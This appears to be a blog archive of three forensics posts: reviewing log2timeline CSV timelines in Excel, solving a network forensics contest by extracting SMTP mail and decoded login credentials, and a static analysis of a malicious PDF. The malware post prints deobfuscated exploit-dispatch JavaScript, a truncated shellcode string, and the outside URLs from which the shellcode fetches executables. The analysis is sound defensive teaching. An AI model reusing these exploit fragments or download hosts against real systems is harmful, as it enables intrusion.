Archive

Posts Tagged ‘analysis’

Timeline Analysis 201 – review the timeline

February 22nd, 2011 1 comment

In this second post in my short series of timeline analysis I’m going to discuss the use of the CSV output module.  In my previous post I discussed a bit about the different modules there are in log2timeline, at least the version that was released then, and the meaning of each entry within the mactime format.  However since then, I’ve started to use the CSV output module instead of the mactime one, which will be the focus today.

After reading the excellent blog post about reviewing timelines using Excel by Corey few months ago I immediately told my self…that’s exactly what I was planning to do for my second series of the timeline analysis post.  However, I wanted to focus more on the CSV output and the benefits of using that, so I decided to a similar blog post as he did, just with a alternative method.  Somehow this blog post just got buried away somewhere far, far away and never got written… well, until now.  You can read the original post by Corey here, and I’m not going to try to repeat what is said there, please read the post yourselves as it contains lots of useful information that I’m not including here.

The problem I’ve got with the mactime format and Excel is the fact that filtering is not really optimal when it comes to something like the supertimeline.  That is to say, it is easy to filter out dates, but as soon as you start trying to filter the description field you start to hit the limitations of Excel quite quickly, just like Corey pointed out.  However, the CSV output module of log2timeline splits up the information into more fields, allowing greater and more fine grained filtering, making the basic filters more useful and the need to go to advanced filters less likely.  So I’m going to focus on that aspect in this post.  The CSV output consists of the following fields:

date,time,timezone,MACB,source,sourcetype,type,user,host,short,desc,\
version,filename,inode,notes,format,extra

The fields meaning is:

  • Date: The date of the event, in the format of MM/DD/YYYY
  • Time: The time of day, expressed in a 24h format, HH:MM:SS
  • Timezone: the timezone that was used to call the tool with.
  • MACB: The MACB meaning of the fields, mostly for compatibility with the mactime format.
  • source: The short name for the source.  All web browser history is for instance WEBHIST, registry entries are REG, simple log files are LOG, etc.
  • sourcetype: A slightly more comprehensive description of the source, “Internet Explorer” instead of WEBHIST, “NTUSER.DAT” instead of REG, etc.
  • type: The type of the timestamp itself, such as “Last Accessed”, “Last Written” or “Last modified”, etc.
  • user: The username associated with the entry, if one is available.
  • host: The hostname associated with the entry, if one is available.
  • short: A short description of the entry, usually contains less text than the full description field.
  • desc: The description field, this is where most of the information is stored, the actual parsed description of the entry.
  • version: The version number of the timestamp object.
  • filename: The filename with the full path of the filename that contained the entry
  • inode: The inode number of the file being parsed.
  • notes: Some input modules insert additional information in the form of a note, which comes here.  Or it can be used during the review by the investigator.
  • format: The name of the input module that was used to parse the file.
  • extra: Some additional information parsed is joined together and put here.

Now we only need to create the timeline… the first step is to generate a timeline using TSK, save to a file, let’s call it “bodyfile”. Then to generate the timeline using log2timeline (in this case we are dealing with a Windows XP image):

cd /mnt/analyze
timescanner -d .  -z local -f winxp -o csv -w /cases/123456/timeline.txt

Now you got two files, one being in CSV format the other in mactime (the one produced by TSK).  Now we need to convert the mactime format into CSV, again using log2timeline to do so. We use the mactime input module to read in the bodyfile, and we append it to the timeline.txt file we created earlier.

log2timeline -f mactime -z local -o csv -w timeline.txt bodyfile

This way we have a file, “timeline.txt”, which is a CSV file containing both the timeline extracted using TSK and log2timeline.  We can now open this file up in Excel.  I’m using the Mac OS X version, so the screenshots might differ a bit from the Windows version, yet the principles should all stay the same (Windows screenshots can be found in Corey’s post here).

Import the File Into Excel

The first step obviously is to open Excel and import the file.  That can be done in two ways, either simply opening the file itself or by choosing “File/Import”.

Go to the menu File/Import...

If you decided to go for the “import” function, the next screen is a choice of file type.  Here we will choose a text file instead of the default value of a CSV file.

Choose a text file

Choosing the file type in the import menu

The next step of the text import wizard gives us the choice of either splitting the file using a fixed with or delimited.  Since this is a comma separated file, we will choose “Delimited”.

Choose a delimited file

The file is comma delimited, so choose delimited.

The third step of the wizard let’s us choose which delimiters we’ve got.  We only want to use the “comma” option, so please un-check the “Tab” field and check the “comma” one.

Don't check the box "tab", instead just have the "comma" box checked

Check the box marked "comma", and un-check the box "tab"

The third and final step of the wizard is to choose the data type for each column.  I usually choose the value of the “date” field as a “Date” of the format “MDY” to make things a bit easier in the final step.

In the last window in the text import wizard, choose the date field as the value "Date: MDY"

In the last window in the text import wizard, choose the date field as the value "Date: MDY"

Sorting

Now all the data is imported, one thing to notice is the fact that timescanner does not sort the timestamps at all.  This is due to the fact that timescanner recursively scans the image, and parses each file it finds, inserting the events as it goes. Therefore we need to sort the data, and create filters.  Start by highlighting the top row and choose “Filter” from the “Data” menu.

Turn on filters for the fields

Highlight fields and choose "Data/Filter"

This turns all of our fields inside the top row into filterable columns, with a drop-down menu.  Now all we need to do is to sort the data in the correct time order.  So we go for the “Data / Sort…” option in the menu.

Go to the "Data/Sort" menu to sort the data

Time to sort the data

To correctly sort the data we start by sorting the fields based on the “Date” column, and we usually want to have the latest events on the top, so we choose to sort on value in the order of “Newest to oldest”.  However this is not enough, since we’ve also got the time field.  We therefore add another field using the “+” sign, there we choose the column “time”, which we also sort on values based on the order of “Largest to Smallest”.

Sorting the timestamp based on date from newest to oldest and time on largest to smallest

Sorting the timestamp based on date from newest to oldest and time on largest to smallest

Now we’ve got our timeline all sorted out and ready to analyse.

Analysis

Just to show the simple filters and what we can do with them.  Now we can easily sort based on the sourcetype for instance.  Just click on the arrow next to the “sourcetype” column and choose which sourcetypes you would like to include in the analysis.

simple filter

Filtering based on sourcetype

Now you can easily choose which days to examine, months or years.  Simply use the “date” column and filter based on that.  Here we are only focusing on January 2009 (or janúar as it is written in Icelandic).

Simple filter (dates)

Filtering dates, simple filter

One final trick I use quite frequently with the simple filters.  As soon as I’ve gone through some timestamps that are of some value, I often highlight them and give them color, usually only use few colors.  Then I can filter out or include only events of certain color.

Color coding fields

Fields can be color coded

Filtering based on color:

Filtering based on colors

Lines can be filtered by the color

Finally the CSV output contains often too many columns.  So it is often wise to hide few columns from view.  I usually hide the following fields:

  • timezone (the same for everyone usually)
  • host (if I’m examining one host only on the timeline)
  • short (better to see the full description)
  • version (don’t care about that one)
  • format
Sometimes I hide other fields as well, depending on the investigation.
Hide fields
Some fields can be hidden

One thing to notice though is the fact that timelines can quickly become way too large for Excel and other spreadsheet application.  The spreadsheet becomes incredibly slow and difficult to manage.  So I usually use some grep and other command-line kung-fu to remove irrelevant entries from the timeline, or only include the timespan of the investigation, that is making it as small as possible.

In my next post, I will go over  some of the command line stuff I usually do to minimize my timeline and other tricks I tend to do before loading it up in Excel.

I will also go over visualization, using the output module of BeeDocs.

And if you have any other suggestions, please add them in the comment section.

Second Network Forensics Contest

November 23rd, 2009 3 comments

I just wanted to go over my solution to the second network forensics contest.

First of all a little disclaimer, since this is a competition where scripting is encouraged I decided beforehand to write a script and not rely on any available tools to complete this task (or at least to minimize usage of previous tools).

To begin with, we know that Ann is being monitored closely, since she was an apparent flight risk. After Ann’s disappearance the police brings along a network capture, claiming it to quite possibly indicate her whereabouts.

There are definitely some questions that need to be answered.  So to begin with, let’s examine the content quickly using tcpdump.  We want to see every IP and port number that has issued any IP traffic.  So let’s begin by quickly seeing all the possible sources.

tcpdump -nn -r evidence02.pcap  | awk -F 'IP' '{print $2}' | \
awk '{print $1}' | sort -nu
reading from file evidence02.pcap, link-type EN10MB (Ethernet)
10.1.1.20.53
64.12.102.142.587
192.168.1.10.52111

And then to see all the destinations.

tcpdump -nn -r evidence02.pcap | grep IP  | awk -F '>' '{print $2}' \
| awk '{print $1}' | sort -nu
reading from file evidence02.pcap, link-type EN10MB (Ethernet)
10.1.1.20.53:
64.12.102.142.587:
192.168.1.30.514:

We see a traffic that most likely is a DNS traffic (port 53) and then some other traffic that seems to going to the server 64.12.102.142 on port 587.  Let’s examine the TCP traffic little bit closer using a script that I wrote for the previous network forensic challenge, pcapcat.

pcapcat -r evidence02.pcap -b 0
[1] TCP 192.168.1.159:1036 -> 64.12.102.142:587
[2] TCP 192.168.1.159:1038 -> 64.12.102.142:587

We see that there are only two TCP connections that have been set up in this dump.  And they correspond with the output that we saw from tcpdump, that is Ann’s laptop is clearly communicating to the sever 64.12.102.142 on port 587.  We need to examine this traffic little closer, so let’s dump it using pcapcat.

pcapcat -r evidence02.pcap
[1] TCP 192.168.1.159:1036 -> 64.12.102.142:587
[2] TCP 192.168.1.159:1038 -> 64.12.102.142:587
Enter the index number of the conversation to dump or press enter to quit: 1
Dumping index value 1
Unable to determine output file
Give the name of the output file: file_1

And the second stream

pcapcat -r evidence02.pcap
[1] TCP 192.168.1.159:1036 -> 64.12.102.142:587
[2] TCP 192.168.1.159:1038 -> 64.12.102.142:587
Enter the index number of the conversation to dump or press enter to quit: 2
Dumping index value 2
Unable to determine output file
Give the name of the output file: file_2

Now we have two files, file_1 and file_2 that contain the gathered TCP stream from the network capture.  Start by checking out what this is. Try to identify the content using the command file, which uses magic values to determine the filetype.

file file_*
file_1: ASCII HTML document text, with CRLF line terminators
file_2: ASCII HTML document text, with CRLF line terminators

According to the file command, we are dealing with a HTML document.  Let’s try to see if that is correct

head -3 file_1
220 cia-mc06.mx.aol.com ESMTP mail_cia-mc06.1; Sat, 10 Oct 2009 15:35:16 -0400
EHLO annlaptop
250-cia-mc06.mx.aol.com host-69-140-19-190.static.comcast.net

head -3 file_2
220 cia-mc07.mx.aol.com ESMTP mail_cia-mc07.1; Sat, 10 Oct 2009 15:37:56 -0400
EHLO annlaptop
250-cia-mc07.mx.aol.com host-69-140-19-190.static.comcast.net

By examining the first three lines in each of these documents it becomes clear to use that this is in fact not a HTML document but a SMTP conversation.  So now we know that Ann was actually sending e-mails to the server 64.12.102.142

What IP address is this, let’s examine that a bit:

 dig -x 64.12.102.142
; <<>> DiG 9.6.0-APPLE-P2 <<>> -x 64.12.102.142
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 57356
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 1
;; QUESTION SECTION:
;142.102.12.64.in-addr.arpa.    IN    PTR
;; ANSWER SECTION:
142.102.12.64.in-addr.arpa. 3600 IN    PTR    smtp-mc.mx.aol.com.
;; AUTHORITY SECTION:
102.12.64.in-addr.arpa.    3600    IN    NS    dns-02.ns.aol.com.
102.12.64.in-addr.arpa.    3600    IN    NS    dns-01.ns.aol.com.
;; ADDITIONAL SECTION:
dns-02.ns.aol.com.    51683    IN    A    205.188.157.232
...

We see that the reverse DNS (or the PTR record) for the IP address points to a server that looks to be a SMTP server belonging to AOL, which can be further strengthen by issuing a whois against the IP address:

whois  64.12.102.142
OrgName:    America Online, Inc.
OrgID:      AMERIC-158
Address:    10600 Infantry Ridge Road
City:       Manassas
StateProv:  VA
PostalCode: 20109
Country:    US
NetRange:   64.12.0.0 - 64.12.255.255
CIDR:       64.12.0.0/16
NetName:    AOL-MTC
NetHandle:  NET-64-12-0-0-1
Parent:     NET-64-0-0-0-0
NetType:    Direct Assignment
NameServer: DNS-01.NS.AOL.COM
NameServer: DNS-02.NS.AOL.COM
Comment:
RegDate:    1999-12-13
Updated:    1999-12-16
RTechHandle: AOL-NOC-ARIN
RTechName:   America Online, Inc.
RTechPhone:  +1-703-265-4670
RTechEmail:  domains@aol.net
# ARIN WHOIS database, last updated 2009-10-15 20:00
# Enter ? for additional hints on searching ARIN's WHOIS database.

So we now know that Ann did in fact send two e-mails to this server that belongs to AOL.  Now we need to examine the conversation a bit better. To do that I created a script called smtp_anex (SMTP ANalyse and EXtraction tool).  So let’s use that script to analyse the traffic:

./smtp_anex -r file_1 -d data_1
------------------------------------------------------------
 SMTP_ANEX (SMTP ANALYSIS AND EXTRACTION)
------------------------------------------------------------
Information from e-mail header
 Mail from:  sneakyg33k@aol.com
 Recipient:  sec558@gmail.com
Information from e-mail body
 Mail from:  "Ann Dercover" <sneakyg33k@aol.com>
 Mail to  :  <sec558@gmail.com>
 Subject  :  lunch next week
Authentication information:
 Username: sneakyg33k@aol.com
 Password: 558r00lz
Header information:
 date :  Sat, 10 Oct 2009 07
 x-mimeole :  Produced By Microsoft MimeOLE V6.00.2900.2180
 x-mailer :  Microsoft Outlook Express 6.00.2900.2180
 content-type :  multipart/alternative;
 boundary="----=_nextpart_000_0006_01ca497c.3e4b6020" :
 x-priority :  3
 x-msmail-priority :  Normal
 mime-version :  1.0
 message-id :  <000901ca49ae$89d698c0$9f01a8c0@annlaptop>
Additional information:
 data_response: 250 OK
 cmd_ehlo: HASH(0x8b3610)
 banner: 220 cia-mc06.mx.aol.com esmtp mail_cia-mc06.1; sat, 10 oct 2009 15:35:16 -0400
 auth_leftovers: 235 - AUTHENTICATION SUCCESSFUL
 data_cmd_response: 354 start mail input, end with "." on a line by itself
 header: HASH(0x8b6ec0)
------------------------------------------------------------
 The message content
------------------------------------------------------------
-------- Text --------
Sorry-- I can't do lunch next week after all. Heading out of town. =
Another time! -Ann
-------- HTML --------
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; =
charset=iso-8859-1">
<META content="MSHTML 6.00.2900.2853" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><FONT face=Arial size=2>Sorry-- I can't do lunch next week =
after all.
Heading out of town. Another time! -Ann</FONT></DIV></BODY></HTML>

The script works by default by going through the SMTP conversation, and plocking out the relevant data.

It then prints the data both on screen and saves it to files (the printing to screen can be silenced using the option -q).  I used the option -d to save all the data in the folder “data_1″, which now contains the following files:

  • 1-HTML.html
  • 1-RAW.txt
  • 1-Text.txt
  • 1-info.txt

We can clearly see from the output that Ann was sending this e-mail from the address sneakyg33k@aol.com and was sending it to the address sec558@gmail.com.  The content of the conversation was (again taken from the output of the script):

Sorry-- I can't do lunch next week after all. Heading out of town. =
Another time! -Ann

This looks to be quite suspicious.  Ann is claiming that se cannot do lunch because she is heading out of town?

We also see the username and password that Ann uses in this conversation:

Authentication information:
 Username: sneakyg33k@aol.com
 Password: 558r00lz

The authentication information that the script reads comes from the command AUTH that is issued during the SMTP conversation:

AUTH LOGIN
334 VXNlcm5hbWU6
c25lYWt5ZzMza0Bhb2wuY29t
334 UGFzc3dvcmQ6
NTU4cjAwbHo=
235 AUTHENTICATION SUCCESSFUL

This is a very common authentication mechanism (LOGIN), where base64 is used to encode the messages, if we just decode it, we get:

S: 334 Username:
C: sneakyg33k@aol.com
S: 334 Password:
C: 558r00lz
S: 235 AUTHENTICATION SUCCESSFUL

where S: denotes server communications and C: client one. But we do not need to do this manually, the script does this for us.

Let’s examine the second e-mail a bit close, again using the script

smtp_anex -r file_2 -d data_2
------------------------------------------------------------
 SMTP_ANEX (SMTP ANALYSIS AND EXTRACTION)
------------------------------------------------------------
Information from e-mail header
 Mail from:  sneakyg33k@aol.com
 Recipient:  mistersecretx@aol.com
Information from e-mail body
 Mail from:  "Ann Dercover" <sneakyg33k@aol.com>
 Mail to  :  <mistersecretx@aol.com>
 Subject  :  rendezvous
Authentication information:
 Username: sneakyg33k@aol.com
 Password: 558r00lz
Header information:
 date :  Sat, 10 Oct 2009 07
 x-mimeole :  Produced By Microsoft MimeOLE V6.00.2900.2180
 x-mailer :  Microsoft Outlook Express 6.00.2900.2180
 boundary="----=_nextpart_000_000d_01ca497c.9dec1e70" :
 content-type :  multipart/mixed;
 x-priority :  3
 x-msmail-priority :  Normal
 mime-version :  1.0
 message-id :  <001101ca49ae$e93e45b0$9f01a8c0@annlaptop>
Additional information:
 data_response: 250 OK
 msg: Attachment dumped to file - name: secretrendezvous.docx
 cmd_ehlo: HASH(0x8b3610)
 banner: 220 cia-mc07.mx.aol.com esmtp mail_cia-mc07.1; sat, 10 oct 2009 15:37:56 -0400
 auth_leftovers: 235 - AUTHENTICATION SUCCESSFUL
 data_cmd_response: 354 start mail input, end with "." on a line by itself
 header: HASH(0x8b6ec0)
------------------------------------------------------------
 The message content
------------------------------------------------------------
-------- Text --------
Hi sweetheart! Bring your fake passport and a bathing suit. Address =
attached. love, Ann
-------- HTML --------
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; =
charset=iso-8859-1">
<META content="MSHTML 6.00.2900.2853" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><FONT face=Arial size=2>Hi sweetheart! Bring your fake passport =
and a

bathing suit. Address attached. love, Ann</FONT></DIV></BODY></HTML>

Now this looks to be quite suspicious, we can see from the output that Ann is again sending an e-mail, and this time to mistersecretx@aol.com with the subject of “rendezvous”.  The text from the message is:

Hi sweetheart! Bring your fake passport and a bathing suit. Address =
attached. love, Ann

We also see from the output of the script the following additional information:

 msg: Attachment dumped to file - name: secretrendezvous.docx

So there was an attachment with the message, let’s examine the output of the folder data_2

  • 1-HTML.html
  • 1-RAW.txt
  • 1-Text.txt
  • 1-info.txt
  • 1-secretrendezvous.docx

We can therefore examine the content of the attachment. First of all, let’s calculate the MD5sum of the docx document that was attached to the e-mail.

9e423e11db88f01bbff81172839e1923  data_2/1-secretrendezvous.docx

Since this is a .docx document, we can use other scripts to read it, such as cat_open_xml.pl

cat_open_xml.pl 1-secretrendezvous.docx
Meet me at the fountain near the rendezvous point. Address below. I'm bringing
all the cash.
returning from a call..

We don’t get much from this, perhaps there is more to this document than just text.  Since we know that docx documents are nothing more than a simple ZIP file we can just extract the content of the document:

unzip -d doc 1-secretrendezvous.docx
Archive:  1-secretrendezvous.docx
 inflating: doc/[Content_Types].xml
 inflating: doc/_rels/.rels
 inflating: doc/word/_rels/document.xml.rels
 inflating: doc/word/document.xml
 extracting: doc/word/media/image1.png  
 inflating: doc/word/theme/theme1.xml
 inflating: doc/word/settings.xml
 inflating: doc/word/webSettings.xml
 inflating: doc/word/styles.xml
 inflating: doc/docProps/core.xml
 inflating: doc/word/numbering.xml
 inflating: doc/word/fontTable.xml
 inflating: doc/docProps/app.xml

Now we see that there is an image that is contained within the document.  Let’s examine it

md5sum doc/word/media/image1.png
aadeace50997b1ba24b09ac2ef1940b7  doc/word/media/image1.png

The image seems to be taken from Google maps, displaying the meeting place.

Playa del Carmen
1. Av. Constituyentes 1 Calle 10 x la 5ta
Avenida
Playa del Carmen, 77780, Mexico
01 984 873 4000
Meeting Place

Meeting Place

Now we know that there are strong indications that Ann’s secret lover has the email address mistersecretx@aol.com (very sneaky address) and that Ann was sending him a message containing a possible meeting point (again a very subtle document called secretrendezvous).  This could very well be the location where she is at right now (since she has disappeared already and this seems to be the only clue of her whereabouts).

The rest is up to the police chief, our job here is done…

Malware analysis

November 19th, 2009 No comments

I decided to to some malware analysis as a part of some presentation I had to do.  And since I went through the process, I decided to post it here if anyone is interested.

To begin with, I needed to find some malware to analyze.  And a great place to find live links to active malware is to visit the site: http://www.malwaredomainlist.com/mdl.php.

What I wanted to show was that despite having a fully patched machine with a fully updated AV is not always enough to protect you.  One way to do that is to either find a PDF or Flash exploit.  The one that I chose for this experiment was this one:

PDF exploit to be used

PDF exploit to be used

First things first, to download the malware example and do some static analysis on it.  First of all I ran pdfid.py from Didier Stevens to get some ID about the PDF document

pdfid.py dhkn.pdf
PDFiD 0.0.9 dhkn.pdf
 PDF Header: %PDF-1.4
 obj                    9
 endobj                 9
 stream                 2
 endstream              2
 xref                   0
 trailer                1
 startxref              1
 /Page                  0
 /Encrypt               0
 /ObjStm                0
 /JS                    1
 /JavaScript            2
 /AA                    0
 /OpenAction            0
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Colors > 2^24         0

By looking at this we can see that there is a Javascript code in the document, which is commonly used to exploit Adobe Reader and we also see that there are some streams in the document.  Now we need to take a closer look at the source code of the document. This can be done with any text editor, such as vim or just use less (or cat).

If we examine the document we don’t see any text part, just a stream that is JavaScript,

...
endstream
endobj
6 0 obj
<</CS /DeviceRGB /S /Transparency >>
endobj
7 0 obj
<</Length 76450 /Filter [/ASCIIHexDecode]>>
stream
7661722066686e7075783d27273b6567686a76783d22223b616567777a3d35303431323b6465757....
...

This stream can be easily decoded.  We see that the filter that is used is a simple ASCIIHexDecode, so I simply copy the stream

grep ^stream dhkn.pdf -A 2  > stream

I then edit the file and deleted lines that did not belong to the stream itself.  Since the file now contained only the hex code of the stream I could decode it with a simple Perl script

#!/usr/bin/perl

use strict;

my $line = undef;
my $string = undef;

my $file = shift;

die( 'Wrong usage: ' . $0 . ' FILE' ) unless -e $file;

open( FH, $file ) or die( 'Unable to read file ' . $file );
open( RW, '>' . $file . '.txt' );

while( $line = <FH> )
{
 print "Processing line\n";
 $line =~ s/\%//g;

 $string = pack 'H*', $line;
 print RW $string;
}

close( FH );
close( RW );

I run the script like this:

./conv.pl stream

The content of the text file stream.txt looks something like this

var fhnpux='';eghjvx="";aegwz=50412;deuv="";var fiqy='',lmuz=false,ekrt=true,gpqr=false,
hnrty='',hloqr=0,dimtz=String,afioxy=dimtz['fkrEoAmkCBhkaBrRCAoAdkeE'.replace(/[EABkR]/g,'')],
gilmq=String,abdmv=gilmq['eBvBaLlI'.replace(/[ILABJ]/g,'')],ikmqw="61",begily="",aefmos=[67,59,
63,151,171,159,153,165,159,160,164,81,156,154,174,144,159,165,94,170,151,163,169,161,98,81,162,...
...

Obviously a obfuscated JavaScript.  So we need to dig a little deeper. To make it easier to read a simple substitution is done

cat stream.txt | sed -e 's/;/;\n/g' > stream.js

This makes the code a litte bit easier to read.  Then to make it even more easy, vim is used to edit the file and add spaces and new lines where needed. There are two things in this code that are interesting (well the two most interesting things that pop up at least).  First of all the function close to the end of the file:

lquv=function()
{
      for(var fjpu;hloqr<aefmos.length;hloqr+=1)
      {
                var fjqu=hloqr%ikmqw.length+1;
                var dorvy=ikmqw.substring(hloqr%ikmqw.length,fjqu);
                var blrwy=aefmos[hloqr];
                begily+=afioxy(blrwy-dorvy.charCodeAt(0));
        }
        abdmv(begily);
};
lquv();

We see that we have a function called “lquv” which is seems to take care of decoding the obfuscation of the code.  We see in the end a function called “adbmv” is called with the parameter of begily, which is the variable that holds the decoded JavaScript.  The function “adbmv” is defined above in the code:

gilmq=String
abdmv=gilmq['eBvBaLlI'.replace(/[ILABJ]/g,'')]

This is a very simple obfuscation.  We see that “gilmq” is defined as a String and then “abdmv” is (when we complete the simple substition)

gilmq['eval']

So when the function calls “abdmv(begily)” we are about to evaluate or execute the code that is displayed in the variable begily.  We therefore need to know what is inside the variable “begily”.  The basis for “begily” resides in the variable “aefmos” (the second interesting thing we found), which is defined as:

aefmos=[67,59,6....

The easiest way (or at least an easy method) to decode this string is simply to modify the stream.js to a HTML document and open it up in a browser or other JavaScript interpreter.

We add to the top of the document

<html>
<head><title>TESTING</title></head>
<body>
<script>

And at the bottom

</script>
</body>
</html>

We then modify the JavaScript itself.  First of all the document ends with a ?, which we delete.  Then we modify the function "lquv" so that it prints the JavaScript instead of evaluating it.

lquv=function()
{
 for(var fjpu; hloqr<aefmos.length;hloqr+=1)
 {
 var fjqu=hloqr%ikmqw.length+1;
 var dorvy=ikmqw.substring(hloqr%ikmqw.length,fjqu);
 var blrwy=aefmos[hloqr];
 begily+=afioxy(blrwy-dorvy.charCodeAt(0));
 }
 //abdmv(begily);
 document.write(begily);
};

The change that I made is written in bold.  I then open this document up in a sandboxed environment to get the variable begily decoded.  This script looks like this:

function fix_it(yarsp, len)
{
 while (yarsp.length * 2 < len)
 {
 yarsp += yarsp;
 }

 yarsp = yarsp.substring(0, len/2);
...

Now we have the true JavaScript code that is to be run on the machine.  Inside this there are several functions, some of which contain the magic variable name “shellcode” or “payload”, which is usually considered to be an indication of a malware (if the obfuscation isn’t enough).  Near the end of the code we see this:

function pdf_start()
{
 var version = app.viewerVersion.toString();
 version = version.replace(/\D/g,'');
 var varsion_array = new Array(version.charAt(0), version.charAt(1), \
version.charAt(2));

 if ((varsion_array[0] == 8 ) && (varsion_array[1] == 0) || \
(varsion_array[1] == 1 && varsion_array[2] < 3))
 {
 util_printf();
 }

 if ((varsion_array[0] < 8 ) || (varsion_array[0] == 8 && \
varsion_array[1] < 2 && varsion_array[2] < 2))
 {
 collab_email();
 }

 if ((varsion_array[0] < 9 ) || (varsion_array[0] == 9 && \
varsion_array[1] < 1))
 {
 collab_geticon();
 }
}

pdf_start();

This function is called in the end and we can see that it begins by getting the Adobe Reader version code before going through an if sentence, trying to determine which exploit to use based on the version number.  This particular exploit is used against Adobe Reader versions:

  • 8.0 or 8.1.0-8.1.2
  • Older versions than 8.0 or version 8.2.0-2
  • Older versions than 9.0 or 9.0

There are different exploits run based on on of listed criteria above.  If we examine the payloads or shellcodes, we see that they are coded using the JavaScript function “escape” and are all similar to the one listed below:

var payload = unescape("%uEBE9%u0001%u5600%uA164%u0030%u0....

To further analyse this malware the payload has to be examined.  So we copy the payload to a file and create a simple Perl script to change the JavaScript to binary:

#!/usr/bin/perl
use strict;
use Encode;

my $file = shift;
my $line = undef;
my $string = undef;
my @chars = undef;
my $done;

die('file does not exist') unless -e $file;

open( FH, $file ) or die( 'Unable to open file: ' . $file );
open( RW, '>' . $file . '.dat' );
binmode RW;

# read all lines
while( <FH> )
{
 @chars = split( /%u/ );
 print "Processing line..\n";
 print "LINE CONSISTS OF " . $#chars . " CHARS\n";

 $done = -1;
 foreach my $char (@chars )
 {
 $done++; # increase done by one
 next unless $done;

 print RW pack( 'v',hex( $char ));
 }

}

close(RW);
close( FH );

So to run the script

./decode_shell shell

Now I’ve got a binary document, called shell.dat which can be easily analysed using strings

strings -a -t x shell.dat
36 QQSVW`
65 B`;U
1a8 PhhC
1d5 PSSSSSS
1f3 QQSVWjB
209 a.ex
229 YYt9
243 YYt
 W
264 YYFF;
274 QSf`
2a1 t
 @8
2ba http://style-boards.com/forum/bmosz2.exe
2e3 http://style-boards.com/forum/click.php?r=

We see that this particular shellcode (the one that is used to exploit version 9.0) is simply downloading more malware to the machine.  There are two files fetched, both of which at the time of analysis were removed from the server in question, so further analysis wasn’t possible.

To test the other payloads, we examine the one that exploits the util_printf vulnerability.

/decode_shell util_shell
Processing line..
LINE CONSISTS OF 391 CHARS
strings -a -t x util_shell.dat
...
209 a.ex
...
2ba http://style-boards.com/forum/cdruz2.exe
2e3 http://style-boards.com/forum/click.php?r=

And the collab_email exploit:

/decode_shell collab_email_shell
Processing line..
LINE CONSISTS OF 392 CHARS
strings -a -t x collab_email_shell.dat
...
209 a.ex
...
2ba http://style-boards.com/forum/fkntuw2.exe
2e4 http://style-boards.com/forum/click.php?r=

We can see that for each of the exploits there are two executable files downloaded.  And the file that comes with “click.php?r=” seems to be the same one for each of them.  The second executable does have a different name, fkntuw2.exe, cdrusz2.exe, bmosz2.exe

I was unable to analyze the executables further since they had all been removed from the server at the time I tried to download them, got a 404 error from the server.  Although the PDF document still remained on the server the last time I checked.

This concluded the static analysis of the code,  I also did a live dynamic analysis of the malware that I might share at a later time, but for now, let the static analysis do.

-->